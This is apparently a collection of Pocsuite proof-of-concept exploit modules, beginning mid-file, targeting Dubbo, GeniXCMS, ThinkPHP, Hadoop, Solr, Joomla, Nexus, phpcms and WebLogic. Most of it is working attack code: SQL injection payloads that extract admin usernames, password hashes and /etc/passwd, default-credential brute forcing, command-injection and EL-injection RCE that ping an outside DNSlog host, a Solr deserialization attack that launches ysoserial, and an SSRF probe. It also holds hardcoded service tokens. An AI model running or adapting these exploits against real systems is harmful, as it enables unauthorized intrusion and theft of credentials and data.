        self.url = self.url.strip('/') + "/anmai/SF_Manage/tfdeleN.aspx"
        payload = "?tfid=%28SELECT%20%20CHAR%28115%29%2bCHAR%28104%29%2bCHAR%28117%29%2bCHAR%2890%29%2bCHAR%2873%29%2bCHAR%28103%29%2bCHAR%28117%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2888%29%2bCHAR%2873%29%2bCHAR%2878%29%2bCHAR%2871%29%29"
        url = self.url + payload
        resp = s.get(url)
        if 'shuZIguanXING' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip


# 基础基类
class DubboPOC(POCBase):
    vulID = '31'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-05-16'  # 漏洞公开的时间,不知道就写今天
    author = 'mel0dyzx'  # PoC作者的大名
    createDate = '2018-05-16'  # 编写 PoC 的日期
    updateDate = '2018-05-16'  # PoC 更新的时间,默认和编写时间一样
    references = ''  # 漏洞地址来源,0day不用写
    name = 'Dubbo Unauthorized Access'  # PoC 名称
    appPowerLink = 'https://github.com/apache/incubator-dubbo'  # 漏洞厂商主页地址
    appName = 'Dubbo'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'Information Disclosure'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Dubbo 未授权访问漏洞
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # 调用指纹方法
        result={}
        output = Output(self)

        import socket
        import telnetlib
        import base64

        # 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口，以下是其他比较常见的dubbo可能存在的端口
        unauth_ports = {     #用于探测 1、直接未授权访问  2、basic 弱口令登录
            "80",
            "443",
            "8080",  #default port   test demo 1.1.1.1
            # "8081",
            # "8082",
            # "8083",
            # "8084",
            # "8086",
            "8088",
            "8888",
            # "8089",
            # "8090",
            "8000", # default pwd test  :http://1.1.1.1:8000/
            # "9080",
            # "9090",
            # "9999",
            # "18080",
            # "28080",
        }
        default_account = {   #默认账号检测  default  root/root(admin)   guest /guest
            "root",
            #"admin",
            "guest",
        }
        default_pwd = {       #默认密码检测
            "root" ,
            #"admin",
            "guest",
        }
        telnet_ports = {
            "7070",    #default port  1.1.1.1
            # "1234",
            # "8000",
            "10001",
            # "9999",
            # "19999",
            # "29999",
            # "20000",
            # "18080",
            # "28080",
            # "6060",
            # "8084",
            # "12345",
        }
        vul_port = []
        #step 1 http 以及弱口令
        for p in unauth_ports:
            url = '%s:%s' % (self.url, p)
            try:
                resp = req.get(str(url), timeout=1)
                #print resp.text
                if "<title>dubbo</title>" in resp.text.lower() :
                        vul_port.append(p)
                elif resp.headers["www-authenticate"] == "Basic realm=\"dubbo\"":
                    #print "get basic"
                    #vul_port.append(p)
                    #构造弱口令爆破
                    for user in default_account:
                        for pwd in default_pwd:
                            verify_str = user + ":" + pwd
                            #print verify_str
                            verify_str = base64.b64encode(verify_str)
                            basic_auth = {'Authorization':'BASIC '+verify_str}
                            #print verify_str
                            httpreq = req.session()
                            raa = httpreq.get(url,headers=basic_auth, timeout=1)
                            #print raa.text
                            #print raa.status_code
                            if 200 == raa.status_code:
                                #print "get weak pwd"
                                py = p + ':(' + user + '|' + pwd + ')'
                                vul_port.append(py)
            except Exception as e:
                #print e
                pass

        #step 2 telnet
        ip = self.url.split(':')[1].replace('/', '')
        for i in telnet_ports:
            try:
                #print ip
                #print i
                tn = telnetlib.Telnet(ip,port=i,timeout=5)
                tn.write("help\n")
                if 'dubbo' in tn.read_until('dubbo'):
                    py = i + '(telnet)'
                    vul_port.append(py)
            except Exception as e:
                #print e
                pass

        if vul_port.__len__() > 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
            result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
        print('[+]31 poc done')
        return self.save_output(result)
        

    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(DubboPOC)





#!/usr/bin/env python
# coding: utf-8
# Download Link: https://www.exploit-db.com/apps/969a9a0c12a219fb5e3658eeaff4e426-GeniXCMS-v0.0.3.zip

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89322'  # vul ID
    version = '1'
    author = 'p9k4r'
    vulDate = '2015-06-21'
    createDate = '2015-10-12'
    updateDate = '2015-10-12'
    references = 'https://packetstormsecurity.com/files/132397/GeniXCMS-0.0.3-Cross-Site-Scripting.html'
    name = 'GeniXCMS 0.0.3 - XSS Vulnerabilities'
    appPowerLink = 'http://www.genixcms.org'
    appName = 'genixcms'
    appVersion = '0.0.3'
    vulType = ' XSS '
    desc = '''
    gxadmin/index.php 页面参数 q 存在反射性XSS
    '''

    def _verify(self):
        path = self.url + "/gxadmin/index.php?page=posts&q=1'<h1>SEBUG@NET</h1>"
        res = req.get(path)
        return self.parse_verify(res)
    
    def parse_verify(self, res):
        output = Output(self)
        result = {}

        if res.status_code == 200 and '<h1>SEBUG@NET</h1>' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):
     
        return self._verify()


register(TestPOC)



from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urlparse, parse_qs
import requests

class Testpoc(POCBase):
	
	vulID = '1'
	name = 'thinkphp 3.2.3 UPDATE 注入'
	appName = 'Thinkphp'
	appVersion = '<= 3.2.3'
	desc = '该注入一般情况下存在用户更新的功能'

	def _verify(self):
			
			result = {}
			payload = r"1%20and%20updatexml(1,concat(0x7,(select%20watch_dog),0x7e),1)"
			url_parse = urlparse(self.url)
			match_string = "Unknown column 'watch_dog' in 'field list'"
			if url_parse.query:
					qs = parse_qs(url_parse.query)
					for i in qs:
							query_list = []
							query_list.append(i+'[]'+'='+'bind'+'&'+i+'[]'+'='+payload)
							for a in qs:
									if a == i:
											continue
									query_list.append(a+'='+qs[a][0])
							query = '&'.join(query_list)
							url = url_parse.scheme+'://'+url_parse.netloc+url_parse.path+url_parse.params+'?'+query

							try:
								req = requests.get(url)
								if match_string in req.text:
										print(req.text)
										print("success")
							except Exception as e:
								pass


						
	def _attack(self):
			return self._verify()
	

register_poc(Testpoc)
			




#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
from pocsuite3.lib.utils import random_str
from collections import OrderedDict
from pocsuite3.api import OptString


class Hadoop(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-14'
    updateDate = '2019-11-14'
    references = ['']
    name = 'Hadoop jstack pstack Servlet Remote Code Execution'
    appPowerLink = ''
    appName = 'Hadoop'
    appVersion = 'hadoop, hbase, hdfs 0.2'
    vulType = 'rce'
    desc = ''' 
    Hadoop jstack pstack Servlet Remote Code Execution
    '''

    def _verify(self):
        result = {}
        payload = random_str(16) + '.6eb4yw.ceye.io'
        cmd = '|ping ' + payload
        path = 'pstack?pid=123'
        path2 = 'jstack?pid=123'
        try:
            if self.url[-1] == '/':
                url = self.url + path + cmd
            else:
                url = self.url + '/' + path + cmd
            attack = requests.get(url)
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if payload in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Hadoop)


#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import subprocess
import signal
import os
import sys
import base64
import re
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

# 需要ysoserial.jar包
# 需要jython-standalone-2.7.1.jar，mjet.py
# 也可以直接只要

'''
CVE-2019-0192
'''
class Solr_RCE_0192(POCBase):
    vulID = 'solr-CVE-2019-1092'
    appName = 'Solr'
    appVersion = 'Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-03-12'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-19'  # 编写 PoC 的日期
    updateDate = '2020-05-22'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/ZtqM2EhB2BbZmDt1omvF6A']  # 漏洞地址来源,0day不用写
    name = 'Solr反序列化远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)


    def _verify(self):
        result={}

        vul_url = self.url    # "http://127.0.0.1:8983"

        target_url = vul_url
        url_cores = vul_url + "/solr/admin/cores?wt=json"

        headers = {"Content-Type": "application/json"}

        command = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)

        RMI_DNSLOG = "{0}.{1}".format(self.BANNER, self.DOMAIN)

        RPORT = "9999"

        post_json = {"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://{0}:{1}/obj".format(RMI_DNSLOG, RPORT)}}

        core_names = self.get_core_names(url_cores)

        print(core_names)
        
        # 对每个core都发送一次请求
        for core_name in core_names:
            config_url = "/solr/" + core_name + "/config"

            target_url = vul_url + config_url
            
            # 漏洞利用
            r = req.post(target_url, headers=headers, json=post_json)
    

            # 漏洞检测
            if self.test_ns_failed(r) or self.test_exception_flag(r):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Payload'] = post_json
                return self.save_output(result) 

            # 如果前面没有返回成功，则休眠2s，最后检查DNSlog
            print("Waiting 2s...")
            time.sleep(2) # 休眠2s等待ceye生成记录
    
            if self.test_dnslog(self.CEYE_URL):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Payload'] = post_json
                return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            sub_domain = d['data'][0]['domain']
            if self.BANNER in sub_domain:
                print(sub_domain)
                return True
        except Exception:
            return False


    # 提供的DNS的域名未被解析成功，也认为已利用成功
    def test_ns_failed(self, p_resp):
        flag = "Unknown host"
        if p_resp.status_code == 500 and flag in p_resp.text:
            return True    


    # 响应中存在这样的异常信息，认为利用成功
    def test_exception_flag(self, p_resp):
        flag = "(undeclared checked exception; nested exception is)"
        if p_resp.status_code == 500 and re.search(flag, p_resp.text):
            return True


    def test_attack_flag(self, p_resp):
        flag = "BadAttributeValueException"   # 与Jdk7u21的payload配套
        if p_resp.status_code == 500 and re.search(flag, p_resp.text):
            return True


    ''' 拿到所有core的名字'''
    def get_core_names(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a


    # 攻击模块
    def _attack(self):
        #return self._verify()
        result={}

        vul_url = self.url    # "http://127.0.0.1:8983"

        target_url = vul_url
        url_cores = vul_url + "/solr/admin/cores?wt=json"

        headers = {"Content-Type": "application/json"}

        command = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
        command = "calc"

        # ysoserial文件路径
        YSOSERIAL_PATH = "D:\\repos\\ysoserial-0.0.6-SNAPSHOT-BETA-all.jar"
        # ysoserial的IP，以及监听的RMI端口
        RHOST = "127.0.0.1"   # 到时候填写ysoserial所在服务器的IP
        RPORT = "9999"

        pro_cmd = "java -cp {0} ysoserial.exploit.JRMPListener {1} Jdk7u21 {2}".format(YSOSERIAL_PATH, RPORT, command)
        pro = subprocess.Popen(pro_cmd, stdout=subprocess.PIPE,shell=True)
        

        post_json = {"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://{0}:{1}/obj".format(RHOST, RPORT)}}

        core_names = self.get_core_names(url_cores)

        print(core_names)
        
        # 对每个core都发送一次请求
        for core_name in core_names:
            config_url = "/solr/" + core_name + "/config"

            target_url = vul_url + config_url
            
            # 漏洞利用
            r = req.post(target_url, headers=headers, json=post_json) #, proxies={'http': 'http://127.0.0.1:8087'})
    
            if self.test_attack_flag(r):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Payload'] = post_json
                result['VerifyInfo']['Command'] = pro_cmd
                return self.save_output(result)
        return self.save_output(result)

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register_poc(Solr_RCE_0192)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '72384'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-12-02'
    createDate = '2016-01-22'
    updateDate = '2016-01-22'
    references = ['http://www.seebug.org/vuldb/ssvid-72384']
    name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'
    appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'
    appName = 'Joomla Jobprofile Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla Jobprofile 组件 index.php 的参数id由于过滤不严，导致出现SQL注入漏洞。
        远程攻击者可以利用该漏洞执行SQL指令。

        利用该漏洞计算md5(1)的POC格式如下：

        http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview
        &id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--

        下面的将分别利用注入漏洞读取joomla管理员口令密码，以及读取/etc/passwd文件的内容。
    '''
    samples = ['http://www.astellas.cz']

    def _attack(self):
        #利用SQL注入读取joomla管理员信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        #利用Union方式读取信息
        payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
        ",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串
        if '$~~~$' in resp.content:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['AdminInfo']={}
                #用户名
                result['AdminInfo']['Username']=match.group(1)
                #密码
                result['AdminInfo']['Password']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞读取/etc/passwd的文件内容
        result = {}
        #文件名称
        filename='/etc/passwd'
        #进行16进制编码
        hexfilename='0x'+filename.encode('hex')
        #访问的地址
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        #利用Union方式读取信息
        payload="-1+union+all+select+1,load_file("+hexfilename+"),3,4,5,6,7,8,9+from+jos_users--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #判断返回结果
        if resp.status_code==200:
            match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)
            #读取文件成功
            if match:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url+exploit
                result['VerifyInfo']['Payload'] = payload
                #记录文件内容
                result['Fileinfo']={}
                result['Fileinfo']['Filename']=filename
                result['Fileinfo']['Content']=match.group(0)+'...'
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class Nexus(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2020-04-02'
    createDate = '2020-04-02'
    updateDate = '2020-06-30'
    references = ['']
    name = 'Nexus Manager 3 远程命令执行漏洞'
    appPowerLink = 'https://oss.sonatype.org/'
    appName = 'Nexus Repository Manager 3.x'
    appVersion = 'Nexus Repository Manager 3.x OSS / Pro <= 3.21.1'
    vulType = 'rce'
    desc = '''
    Nexus Manager 3 远程命令执行漏洞（CVE-2020-10204)
    '''

    def _options(self):
        o = OrderedDict()
        o['session'] = OptString('', description='current nexus session', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            target = self.url + '/service/extdirect'
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            payload = 'ping ' + cmd
            data = """
            {"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}"],"roles":[]}],"type":"rpc","tid":89}
            """ % payload
            r = requests.post(url=target, headers=self._headers, data=data, timeout=20)
            if r.status_code == 200:
                if "UNIXProcess" in r.text:
                    res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                    if cmd in res:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = target
                        result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'accept': "application/json",
            'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
            'NX-ANTI-CSRF-TOKEN': "0.856555763510765",
            'Content-Type': "application/json",
            'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=" + self.get_option('session') + ""
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Nexus)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'phpcms2008 c.php referer sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=16639']
    desc = '''phpcms2008 referer 主要针对phpcms2008sp4 c.phpSQL注入'''

    vulDate = '2013-5-31'
    createDate = '2019-03-26'
    updateDate = '2019-03-26'

    appName = 'phpcms2008sp4'
    appVersion = '2008sp4'
    appPowerLink = 'http://www.phpcms.cn/'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/c.php?id=1"
        payload = "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),(SELECT concat(0x7e,database(),0x7e)))a from information_schema.tables group by a)b),'"
        header = {
            'referer': payload
        }
        resp = s.get(self.url, headers=header)
        time.sleep(2)
        dbname = re.search('~(.*?)~', resp.content)
        if dbname:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname.group(1)
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/c.php?id=1"
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        payload = "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),(SELECT {}))a from information_schema.tables group by a)b),'".format(flag)
        header = {
            'referer': payload
        }
        resp = s.get(self.url, headers=header)
        time.sleep(2)
        if flag in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




import time
import threading
import traceback

from cvpoc.lib.core.data import conf
from cvpoc.lib.core.data import kb
from cvpoc.lib.core.data import logger
from cvpoc.lib.core.exception import PocsuiteConnectionException
from cvpoc.lib.core.exception import PocsuiteThreadException
from cvpoc.lib.core.exception import PocsuiteUserQuitException
from cvpoc.lib.core.exception import PocsuiteValueException
from cvpoc.lib.core.settings import MAX_NUMBER_OF_THREADS


def exception_handled_function(thread_function, args=(), silent=False):
    try:
        thread_function(*args)
    except KeyboardInterrupt:
        kb.thread_continue = False
        kb.thread_exception = True
        raise
    except Exception as ex:
        if not silent:
            logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
            if conf.verbose > 1:
                traceback.print_exc()


def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
    threads = []

    kb.multi_thread_mode = True
    kb.thread_continue = True
    kb.thread_exception = False

    try:
        if num_threads > 1:
            if start_msg:
                info_msg = "starting {0} threads".format(num_threads)
                logger.info(info_msg)

            if num_threads > MAX_NUMBER_OF_THREADS:
                warn_msg = "starting {0} threads, more than MAX_NUMBER_OF_THREADS:{1}".format(num_threads, MAX_NUMBER_OF_THREADS)
                logger.warn(warn_msg)

        else:
            thread_function(*args)
            return

        # Start the threads
        for num_threads in range(num_threads):
            thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
                                      args=(thread_function, args))
            thread.setDaemon(True)
            try:
                thread.start()
            except Exception as ex:
                err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
                logger.critical(err_msg)
                break

            threads.append(thread)

        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)

    except (KeyboardInterrupt, PocsuiteUserQuitException) as ex:
        kb.thread_continue = False
        kb.thread_exception = True
        logger.info("user aborted (Ctrl+C was pressed multiple times")
        if forward_exception:
            return

    except (PocsuiteConnectionException, PocsuiteValueException) as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        if conf.verbose > 1:
            traceback.print_exc()

    except Exception as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        traceback.print_exc()

    finally:
        kb.multi_thread_mode = False
        kb.thread_continue = True
        kb.thread_exception = False



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase

class Weblogic(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-06'
    updateDate = '2019-11-06'
    references = ['']
    name = 'Weblogic uddiexplorer SSRF'
    appPowerLink = ''
    appName = 'Weblogic'
    appVersion = 'all'
    vulType = 'Weblogic uddiexplorer SSRF'
    desc = ''' 
    Weblogic uddiexplorer SSRF
    '''

    @property
    def _headers(self):
        headers = {
            'Content-Type': 'text/xml',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        }
        return headers

    def _verify(self):
        result = {}
        payload = 'uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001'
        try:
            if self.url[-1] == '/':
                url = self.url + payload
            else:
                url = self.url + '/' + payload
            res = requests.get(
                url = url,
                headers = self.headers,
                timeout = 5
            )
            if res.status_code == 200 and 'Oracle WebLogic Server' in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Weblogic)